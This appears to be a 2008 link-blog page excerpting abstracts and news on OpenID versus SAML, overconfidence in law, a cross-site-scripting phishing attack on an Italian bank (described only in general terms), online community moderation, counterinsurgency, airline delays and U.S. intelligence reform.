Being "always on" is being always off, to something.
Technical Comparison: OpenID and SAML
Topic: Technology
6:31 am EST, Jan 10, 2008
This document presents a technical comparison of the OpenID Authentication protocol and the Security Assertion Markup Language (SAML) Web Browser SSO Profile and the SAML framework itself. Topics addressed include design centers, terminology, specification set contents and scope, user identifier treatment, web single sign-on profiles, trust, security, identity provider discovery mechanisms, key agreement approaches, as well as message formats and protocol bindings. An executive summary targeting various audiences, and presented from the perspectives of end-users, implementors, and deployers, is provided. We do not attempt to assign relative value between OpenID and SAML, e.g. which is "better"; rather, it attempts to present an objective technical comparison.
Overconfidence is a psychologically-generated distortion of perception consisting of an inflated estimation of one's future success. Because both economics and law usually encourage accurate and calculated estimates of risk, overconfidence is regarded to be detrimental to human judgment and it is denounced as a vice. When an assumption of risk is subsequently realized, the presence of overconfidence is thought to prove that the assumption of risk was ex ante unwarranted.
The main argument of this paper is that overconfidence is underrated. Overconfidence can have constructive value in a variety of situations in which people tend to display a hyperbolic discounting of future utility, which produces in turn inconsistencies in their preferences over time. Intuitively, by artificially raising the estimation of future rewards overconfidence can be instrumental if it offsets the inhibitory effects of exaggerated preference of present rewards. Thus it can produce greater incentive, greater perseverance, resolute performance, and consequently higher achievements. Examples of this effect are found in situations of negotiation, in the improved recovery rate from serious disease and in situations of violent confrontation or wars.
Because overconfidence can lead to positive outcomes, there is at times an incentive to manipulate the facts perceived by the decision maker in order to build up his confidence and increase the efficiency of the decision. These manipulations are a branch of the general theory of non-cooperative games with non-perfect information. We particularly draw attention to internal manipulations, performed by the same player between two points in time, where the former concerns the latter. These manipulations consist in constructive self-deceit and include, inter alia, selective memory, deliberate forgetfulness, and calculated inadvertence. In light of the constructive value of overconfidence, we regard these common mental practices as possibly rational and beneficial.
It follows that under some circumstances, and in particular where the assumption of calculated risk should be encouraged and the chilling effect of over-deterrence should be eschewed, a systematically erroneous assessment of the risk is a key to optimal behavior. Therefore, we criticize the common supposition, according to which an overconfident person should be deemed negligent even if his overconfidence proves useful. We further object to the common view, according to which an intended manipulation of memory should necessarily entail recklessness. For similar reasons, we argue that the law of complicity should acknowledge friendship and love as countervailing the need to combat crime, inasmuch as friendship and love are instrumental to self-esteem.
An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page.
The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.
Online Communities Rot Without Daily Tending By Human Hands
Topic: Technology
8:37 pm EST, Jan 8, 2008
I changed my mind about online community this year.
I still believe that there is no fully automated system capable of managing the complexities of online human interaction — no software fix I know of. But I'd underestimated the power of dedicated human attention.
Plucking one early weed from a bed of germinating seeds changes everything. Small actions by focused participants change the tone of the whole. It is possible to maintain big healthy gardens online. The solution isn't cheap, or easy, or hands-free. Few things of value are.
Normally in an election year, U.S. attention on global affairs dwindles precipitously, allowing other powers to set the agenda. That will not be the case, however, in 2008.
The Inter-agency and Counterinsurgency Warfare: Aligning and Integrating Military and Civilian Roles in Stability, Security, Transition, and Reconstruction Operations
Topic: Politics and Law
8:37 pm EST, Jan 8, 2008
For decades since the formation of the defense establishment under the 1947 National Security Act, all U.S. cabinet departments, national security agencies, and military services involved in providing for the common defense have struggled to overcome differences in policy and strategy formulation, organizational cultures, and even basic terminology. Post-September 11, 2001, international systems, security environments, U.S. military campaigns in Afghanistan and Iraq, and the greater Global War on Terrorism have confronted civilian policymakers and senior military officers with a complex, fluid battlefield which demands kinetic and counterinsurgency capabilities. This monograph addresses the security, stability, transition, and reconstruction missions that place the most pressure on interagency communication and coordination. The results from Kabul to Baghdad reveal that the interagency process is in need of reform and that a more robust effort to integrate and align civilian and military elements is a prerequisite for success.
On December 27, we issued the ninth in a series of our periodic updates to our Aviation Industry Performance Report. The report graphically identifies trends in aviation demand and capacity, aviation system performance, airline finances and service to small communities. This edition of the report focused on the summer of 2007, a time period when aviation delays as well as cancellations reached new highs and airline service captured the attention of the public, Congress, the Secretary of Transportation and the President of the United States. We found that airline on-time performance deteriorated broadly during the summer of 2007. Of the 55 large airports tracked by FAA, the number of delayed flights increased at 51 of the airports and the length of delays increased at 52 airports. Flight arrival delays, during the summer of 2007, increased by 15 percent from summer 2006 levels. In contrast, the number of scheduled flights increased at only 32 of the airports. Additionally, summer 2007 flight cancellations rose 28 percent from last year.
To address the challenges facing the U.S. Intelligence Community in the 21st century, congressional and executive branch initiatives have sought to improve coordination among the different agencies and to encourage better analysis. In December 2004, the Intelligence Reform and Terrorism Prevention Act (P.L. 108- 458) was signed, providing for a Director of National Intelligence (DNI) with substantial authorities to manage the national intelligence effort. The legislation also established a separate Director of the Central Intelligence Agency.
Making cooperation effective presents substantial leadership and managerial challenges. The needs of intelligence “consumers” — ranging from the White House to cabinet agencies to military commanders — must all be met, using the same systems and personnel. Intelligence collection systems are expensive and some critics suggest there have been elements of waste and unneeded duplication of effort while some intelligence “targets” have been neglected.
The DNI has substantial statutory authorities to address these issues, but the organizational relationships will remain complex, especially for Defense Department agencies. Members of Congress will be seeking to observe the extent to which effective coordination is accomplished. FY2008 intelligence authorization legislation (H.R. 2082/S. 1538) addresses some of these concerns.
International terrorism, a major threat facing the United States in the 21st century, presents a difficult analytical challenge. Techniques for acquiring and analyzing information on small groups of plotters differ significantly from those used to evaluate the military capabilities of other countries. U.S. intelligence efforts are complicated by unfilled requirements for foreign language expertise. Whether all terrorist surveillance efforts have been consistent with the Foreign Intelligence Surveillance Act of 1978 (FISA) has been a matter of controversy. Changes to FISA are included in H.R. 3773 and S. 2248. S. 2248 was debated by the Senate on December 17, 2007 but further action was postponed until early 2008.
Intelligence on Iraqi weapons of mass destruction was inaccurate and Members have criticized the performance of the Intelligence Community in regard to current conditions in Iraq and other situations. Improved analysis, while difficult to mandate, remains a key goal. Better human intelligence, it is argued, is also essential. Intelligence support to military operations continues to be a major responsibility of intelligence agencies. The use of precision guided munitions depends on accurate, real-time targeting data; integrating intelligence data into military operations will require changes in organizational relationships as well as acquiring necessary technologies.
Counterterrorism requires the close coordination of intelligence and law enforcement agencies, but there remain many institutional and procedural issues that complicate cooperation between the two sets of agencies. This report will be updated as new information becomes available.